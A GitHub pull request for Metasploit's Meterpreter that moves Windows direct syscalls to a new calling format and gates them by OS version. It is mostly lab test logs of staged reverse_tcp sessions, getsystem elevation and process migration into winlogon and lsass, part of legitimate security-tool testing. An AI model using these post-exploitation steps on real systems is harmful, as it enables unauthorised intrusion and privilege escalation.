Skip to content

Fixing direct syscall to use new format#795

Merged
bwatters-r7 merged 5 commits intorapid7:masterfrom
jbx81-1337:feat/direct-syscall-new-format
Apr 3, 2026
Merged

Fixing direct syscall to use new format#795
bwatters-r7 merged 5 commits intorapid7:masterfrom
jbx81-1337:feat/direct-syscall-new-format

Conversation

@jbx81-1337
Copy link
Copy Markdown
Contributor

@jbx81-1337 jbx81-1337 commented Mar 18, 2026

@bwatters-r7 bwatters-r7 self-assigned this Mar 19, 2026
@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented Mar 19, 2026

@jbx81-1337 what versions of Windows does this support? I gaether the best test is t get a Meterpreter session, then try to migrate?

@jbx81-1337
Copy link
Copy Markdown
Contributor Author

jbx81-1337 commented Mar 19, 2026
edited
Loading

It should be supporting everything we currently support

@jbx81-1337
Copy link
Copy Markdown
Contributor Author

jbx81-1337 commented Mar 20, 2026

@bwatters-r7 This should be ready for review / testing

@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented Mar 20, 2026
edited
Loading

Windows 10 x86 1511

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > 
[*] Client 10.5.132.101 requested /x4q-uTjhIlGHZRlP4MZYCA
[*] Sending payload to 10.5.132.101 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.101 requested /x4q-uTjhIlGHZRlP4MZYCA
[*] Sending payload to 10.5.132.101 (CertUtil URL Agent)
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
[*] Sending stage (200774 bytes) to 10.5.132.101
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.101:50621) at 2026-03-20 17:03:01 -0500

msf payload(cmd/windows/http/x86/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DESKTOP-BBGO15H
OS              : Windows 10 1511 (10.0 Build 10586).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-BBGO15H\msfuser
meterpreter > getsystem
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                  x86   0
 628   4     smss.exe                x86   0
 652   932   svchost.exe             x86   0
 720   712   csrss.exe               x86   0
 800   712   wininit.exe             x86   0
 816   792   csrss.exe               x86   1
 880   792   winlogon.exe            x86   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
...

meterpreter > migrate 880
[*] Migrating from 5440 to 880...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Migration completed successfully.
meterpreter > pid
[-] Unknown command: pid. Did you mean pwd? Run the help command for more details.
meterpreter > getpid
Current pid: 880
meterpreter >

@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented Mar 23, 2026

I finished testing x86 targets.
image

The only failure is Windows 2003x86. I tried to migrate as Administrator and System into winlogon and lsass. All failed.

2003x86 FAILED
msf payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 12...

meterpreter > sysinfo
Computer        : WIN2003X86
OS              : Windows Server 2003 (5.2 Build 3790).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN2003X86\Administrator
meterpreter > getpid
Current pid: 1668
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                      Path
 ---   ----  ----              ----  -------  ----                      ----
 0     0     [System Process]
 4     0     System            x86   0
 224   1864  IEXPLORE.EXE      x86   0        WIN2003X86\Administrator  C:\Program Files\Internet Explorer\IEXPLORE.EXE
 404   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM       \SystemRoot\System32\smss.exe
 452   404   csrss.exe         x86   0        NT AUTHORITY\SYSTEM       \??\C:\WINDOWS\system32\csrss.exe
 476   404   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM       \??\C:\WINDOWS\system32\winlogon.exe
 520   476   services.exe      x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\services.exe
 532   476   lsass.exe         x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\lsass.exe
 684   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\svchost.exe
 748   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\System32\svchost.exe
 916   520   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1012  520   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1024  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\System32\svchost.exe
 1100  684   wmiprvse.exe      x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\wbem\wmiprvse.exe
 1200  520   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\spoolsv.exe
 1228  520   msdtc.exe         x86   0                                  C:\WINDOWS\system32\msdtc.exe
 1332  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\System32\svchost.exe
 1380  520   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1576  520   dfssvc.exe        x86   0        NT AUTHORITY\SYSTEM       C:\WINDOWS\system32\Dfssvc.exe
 1668  224   test90.exe        x86   0        WIN2003X86\Administrator  C:\Documents and Settings\Administrator\Desktop\test90.exe
 1864  1844  explorer.exe      x86   0        WIN2003X86\Administrator  C:\WINDOWS\Explorer.EXE
 1956  476   wpabaln.exe       x86   0        WIN2003X86\Administrator  C:\WINDOWS\system32\wpabaln.exe

meterpreter > migrate 476
[*] Migrating from 1668 to 476...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] 10.5.132.140 - Meterpreter session 12 closed.  Reason: Died


^C[-] migrate: Interrupted
msf payload(windows/meterpreter/reverse_tcp) > 
msf payload(windows/meterpreter/reverse_tcp) > sessions

Active sessions
===============

No active sessions.

msf payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] Sending stage (200774 bytes) to 10.5.132.140
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 13 opened (10.5.135.201:4444 -> 10.5.132.140:1062) at 2026-03-23 17:49:31 -0500

msf payload(windows/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer        : WIN2003X86
OS              : Windows Server 2003 (5.2 Build 3790).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN2003X86\Administrator
meterpreter > getsystem
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getpid
Current pid: 228
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > migrate 476
[*] Migrating from 228 to 476...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] 10.5.132.140 - Meterpreter session 13 closed.  Reason: Died

meterpreter > sysinfo
Computer        : WIN2003X86
OS              : Windows Server 2003 (5.2 Build 3790).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/elevator.x86.dll is being used
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getpid
Current pid: 1212
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System            x86   0        NT AUTHORITY\SYSTEM
 224   1864  IEXPLORE.EXE      x86   0        WIN2003X86\Administrator      C:\Program Files\Internet Explorer\IEXPLORE.EXE
 404   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 452   404   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 476   404   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 520   476   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 532   476   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 684   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 748   520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 916   520   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1012  520   svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1024  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1100  684   wmiprvse.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\wbem\wmiprvse.exe
 1200  520   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1212  1864  test90.exe        x86   0        WIN2003X86\Administrator      C:\Documents and Settings\Administrator\Desktop\test90.
                                                                            exe
 1228  520   msdtc.exe         x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 1332  520   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1380  520   svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1576  520   dfssvc.exe        x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\Dfssvc.exe
 1864  1844  explorer.exe      x86   0        WIN2003X86\Administrator      C:\WINDOWS\Explorer.EXE
 1956  476   wpabaln.exe       x86   0        WIN2003X86\Administrator      C:\WINDOWS\system32\wpabaln.exe

meterpreter > migrate 532
[*] Migrating from 1212 to 532...
WARNING: Local file /home/tmoose/rapid7/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used

[*] 10.5.132.140 - Meterpreter session 14 closed.  Reason: Died

@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented Mar 24, 2026
edited
Loading

I've verified this works on the following x64 builds:
Win 2003x64 R1
Win2008x64 R1
Win 7x64
Win 8x64
Win 8.1x64
Win 10x64
Win10x64 1511
Win 10x64 22H2
Win 11x64
Win 11x6423H2
I also verified you can migrate from x64->x64->x86

Win 11x64 24H2, 25H2, and 26H1 all crash after establishing a session without calling migrate. Tomorrow, I'll look into that and see if there's an issue with Defending being a lying jerk of a liar about being turned off.

@bwatters-r7
Copy link
Copy Markdown
Contributor

bwatters-r7 commented Mar 26, 2026

We are waiting to land this to a temporary branch, correct?

@dledda-r7
Copy link
Copy Markdown
Contributor

dledda-r7 commented Mar 30, 2026
edited
Loading

@bwatters-r7 the fix i did now should fix the issue you were having. this should disable direct syscalls for systems before 6.1, meaning in theory we can land this to master. you call if you want me to point it to 6.5 just to be more in "peace". I would probably prefer have it in 6.5 as this give us marginally more flexibility research wise, also for future PRs

cdelafuente-r7
cdelafuente-r7 reviewed Mar 30, 2026
View reviewed changes
@adfoster-r7 adfoster-r7 requested a review from Copilot March 30, 2026 12:15
Copilot AI reviewed Mar 30, 2026
View reviewed changes
Copy link
Copy Markdown

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Updates Meterpreter’s Windows direct-syscall integration to use the newer SyscallStub calling format, and adds an OS-version-based gate (via RtlGetVersion) before enabling direct syscalls.

Changes:

  • Switch direct-syscall wrappers to pass an argument array + arg count into the new SyscallStub signature.
  • Add winapi_ntdll_RtlGetVersion and expose it via the WinApi/MetApi function table.
  • Add a Windows version check in hasDirectSyscallSupport() before initializing/using direct syscalls.

Reviewed changes

Copilot reviewed 5 out of 5 changed files in this pull request and generated 3 comments.

File Description
c/meterpreter/source/metsrv/winapi.h Exposes winapi_ntdll_RtlGetVersion prototype.
c/meterpreter/source/metsrv/winapi.c Updates syscall wrapper calling convention; adds version detection + gating; implements RtlGetVersion resolver.
c/meterpreter/source/metsrv/metapi.c Extends the exported WinApi ntdll function table initialization to include RtlGetVersion.
c/meterpreter/source/common/common_winapi.h Extends WinApiNtdll with RtlGetVersion function pointer.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

@jbx81-1337 @cdelafuente-r7
fix: fixed direct syscall support version check logic bug
aab5b43 
Co-authored-by: Christophe De La Fuente <christophe_delafuente@rapid7.com>
@bwatters-r7 bwatters-r7 merged commit ab070b5 into rapid7:master Apr 3, 2026
69 of 83 checks passed
@bwatters-r7 bwatters-r7 mentioned this pull request Apr 6, 2026
Merged
3 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

Copilot code review Copilot Copilot left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

5 participants

@jbx81-1337 @bwatters-r7 @dledda-r7 @cdelafuente-r7